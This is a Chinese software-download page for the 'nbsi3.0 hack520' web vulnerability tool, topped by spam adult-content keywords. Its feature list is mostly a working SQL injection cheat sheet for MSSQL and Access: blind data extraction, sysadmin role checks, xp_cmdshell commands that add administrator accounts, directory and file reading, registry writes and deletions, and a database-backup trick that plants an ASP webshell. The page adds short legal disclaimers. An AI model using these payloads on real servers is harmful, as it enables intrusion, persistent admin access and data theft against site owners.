免费黄色视频在线观看不卡无码国产一区二区三区_亚洲中文字幕无码中文字 _亚洲 国产专区 校园 欧美_国内自拍真实伦在线视频_国产精品成人观看视频免费

河東軟件園:綠色免費的軟件下載站! 最新軟件|軟件分類|軟件專題|軟件發(fā)布

所在位置:首頁 > 網(wǎng)絡軟件 > 網(wǎng)絡監(jiān)測 > nbsi網(wǎng)站漏洞檢測工具(nbsi3.0) hack520 專用版

nbsi網(wǎng)站漏洞檢測工具(nbsi3.0)

 hack520 專用版
  • 軟件大?。?span itemprop="fileSize">4.02 MB
  • 更新日期:2016-11-15
  • 軟件語言:簡體中文
  • 軟件類別:網(wǎng)絡監(jiān)測
  • 軟件授權:免費軟件
  • 軟件官網(wǎng):
  • 適用平臺:WinXP, Win7, Win8, Win10, WinAll
  • 軟件廠商:

8.9
軟件評分

本地下載文件大?。?.02 MB 高速下載需下載高速下載器,提速50%

軟件介紹人氣軟件相關文章網(wǎng)友評論下載地址

為您推薦:網(wǎng)絡監(jiān)測

  nbsi網(wǎng)站漏洞檢測工具(nbsi3.0)是一款功能非常強大的安全檢測工具;它包括了注入分析、網(wǎng)站掃描、getwebshell、掃描、工具等欄目,并且可以支持進行PHP、ASP的網(wǎng)站漏洞的安全檢測,使自己的服務器不被工具,可更好的保護自己;軟件的操作簡單,使用方便,界面清晰,完全免費,需要的朋友趕快將nbsi網(wǎng)站漏洞檢測工具(nbsi3.0)下載來使用試試吧,如果使用軟件進行非法的行為,一切的后果本站概不負責!

nbsi網(wǎng)站漏洞檢測工具(nbsi3.0) hack520 專用版

軟件功能

  1.判斷是否有注入

  ;and 1=1

  ;and 1=2

  2.初步判斷是否是mssql

  ;and user>0

  3.判斷數(shù)據(jù)庫系統(tǒng)

  ;and (select count(*) from sysobjects)>0 mssql

  ;and (select count(*) from msysobjects)>0 access

  4.注入?yún)?shù)是字符

  'and [查詢條件] and ''='

  5.搜索時沒過濾參數(shù)的

  'and [查詢條件] and '%25'='

  6.猜數(shù)據(jù)庫

  ;and (Select Count(*) from [數(shù)據(jù)庫名])>0

  7.猜字段

  ;and (Select Count(字段名) from 數(shù)據(jù)庫名)>0

  8.猜字段中記錄長度

  ;and (select top 1 len(字段名) from 數(shù)據(jù)庫名)>0

  9.(1)猜字段的ascii值(access)

  ;and (select top 1 asc(mid(字段名,1,1)) from 數(shù)據(jù)庫名)>0

  (2)猜字段的ascii值(mssql)

  ;and (select top 1 unicode(substring(字段名,1,1)) from 數(shù)據(jù)庫名)>0

  10.測試權限結構(mssql)

  ;and 1=(SELECT IS_SRVROLEMEMBER('sysadmin'));--

  ;and 1=(SELECT IS_SRVROLEMEMBER('serveradmin'));--

  ;and 1=(SELECT IS_SRVROLEMEMBER('setupadmin'));--

  ;and 1=(SELECT IS_SRVROLEMEMBER('securityadmin'));--

  ;and 1=(SELECT IS_SRVROLEMEMBER('diskadmin'));--

  ;and 1=(SELECT IS_SRVROLEMEMBER('bulkadmin'));--

  ;and 1=(SELECT IS_MEMBER('db_owner'));--

  11.添加mssql和系統(tǒng)的帳戶

  ;exec master.dbo.sp_addlogin username;--

  ;exec master.dbo.sp_password null,

  username,password;--

  ;exec master.dbo.sp_addsrvrolemember sysadmin

  username;--

  ;exec master.dbo.xp_cmdshell 'net user username

  password /workstations:* /times:all

  /passwordchg:yes /passwordreq:yes /active:yes /add'

  ;--

  ;exec master.dbo.xp_cmdshell 'net user username

  password /add';--

  ;exec master.dbo.xp_cmdshell 'net localgroup

  administrators username /add';--

  12.(1)遍歷目錄

  ;create table dirs(paths varchar(100), id int)

  ;insert dirs exec master.dbo.xp_dirtree 'c:'

  ;and (select top 1 paths from dirs)>0

  ;and (select top 1 paths from dirs where paths not

  in('上步得到的paths'))>)

  (2)遍歷目錄

  ;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));--

  ;insert temp exec master.dbo.xp_availablemedia;-- 獲得當前所有驅(qū)動器

  ;insert into temp(id) exec master.dbo.xp_subdirs 'c:';-- 獲得子目錄列表

  ;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:';-- 獲得所有子目錄的目錄樹結構

  ;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:webindex.asp';-- 查看文件的內(nèi)容

  13.mssql中的存儲過程

  xp_regenumvalues 注冊表根鍵, 子鍵

  ;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE',

  'SOFTWAREmicrosoftWindowsCurrentVersionRun' 以多個記錄集方式返回所有鍵值

  xp_regread 根鍵,子鍵,鍵值名

  ;exec xp_regread 'HKEY_LOCAL_MACHINE',

  'SOFTWAREMicrosoftWindowsCurrentVersion',

  'CommonFilesDir' 返回制定鍵的值

  xp_regwrite 根鍵,子鍵, 值名, 值類型, 值

  值類型有2種REG_SZ 表示字符型,REG_DWORD 表示整型

  ;exec xp_regwrite 'HKEY_LOCAL_MACHINE',

  'SOFTWAREMicrosoftWindowsCurrentVersion',

  'TestValueName','reg_sz','hello' 寫入注冊表

  xp_regdeletevalue 根鍵,子鍵,值名

  exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE',

  'SOFTWAREMicrosoftWindowsCurrentVersion',

  'TestValueName' 刪除某個值

  xp_regdeletekey 'HKEY_LOCAL_MACHINE',

  'SOFTWAREMicrosoftWindowsCurrentVersionTestkey' 刪除鍵,包括該鍵下所有值

  14.mssql的backup創(chuàng)建webshell

  use model

  create table cmd(str image);

  insert into cmd(str) values ('');

  backup database model to disk='c:l.asp';

  15.mssql內(nèi)置函數(shù)

  ;and (select @@version)>0 獲得Windows的版本號

  ;and user_name()='dbo' 判斷當前系統(tǒng)的連接用戶是不是sa

  ;and (select user_name())>0 爆當前系統(tǒng)的連接用戶

  ;and (select db_name())>0 得到當前連接的數(shù)據(jù)庫

  16.簡潔的webshell

  use model

  create table cmd(str image);

  insert into cmd(str) values ('');

  backup database model to disk='g:wwwtestl.asp';

  請求的時候,像這樣子用:

  http://ip/l.asp?c=dir

軟件特色

  本工具功能非常強大,希望同學們用于正途

  別去做一些偷雞摸狗的令人可恥的事情

  由VB語言編寫的網(wǎng)站漏洞檢測工具的名稱

  ASP注入漏洞檢測工具

  特別在SQL Server注入檢測方面有極高的準確率

使用方法

  1、下載文件找到"SWebVulnsScan.exe"雙擊運行,進入軟件;

  2、進入軟件,出現(xiàn)下圖界面,如下圖;

nbsi網(wǎng)站漏洞檢測工具(nbsi3.0) hack520 專用版

  3、系統(tǒng)設置包括了開始域名、域名的總數(shù)、日志等;

nbsi網(wǎng)站漏洞檢測工具(nbsi3.0) hack520 專用版

  4、CMS識別包括了配置、導入域名、導入、當前識別、識別的結果、CMS程序等;

nbsi網(wǎng)站漏洞檢測工具(nbsi3.0) hack520 專用版

  5、漏洞掃描包括了導入域名、域名總數(shù)、通用的CMS漏洞、通用組件漏洞等;

nbsi網(wǎng)站漏洞檢測工具(nbsi3.0) hack520 專用版

  6、目錄掃描包括了域名,導入、指紋識別、急速掃描、精確掃描等;

nbsi網(wǎng)站漏洞檢測工具(nbsi3.0) hack520 專用版

更新日志

  修復http發(fā)包API錯誤問題

  優(yōu)化字典,刪了10萬無用字典

  顯示狀態(tài)可是設置提示那些狀態(tài)碼或者不提示那些狀態(tài)碼

  這個是黑客工具,來自NB官方!只能用于安全檢測,非法入侵他人網(wǎng)站必將受到法律嚴懲。

下載地址

人氣軟件

查看所有評論>>網(wǎng)友評論0

發(fā)表評論

您的評論需要經(jīng)過審核才能顯示

精彩評論

最新評論

蓋樓回復X

(您的評論需要經(jīng)過審核才能顯示)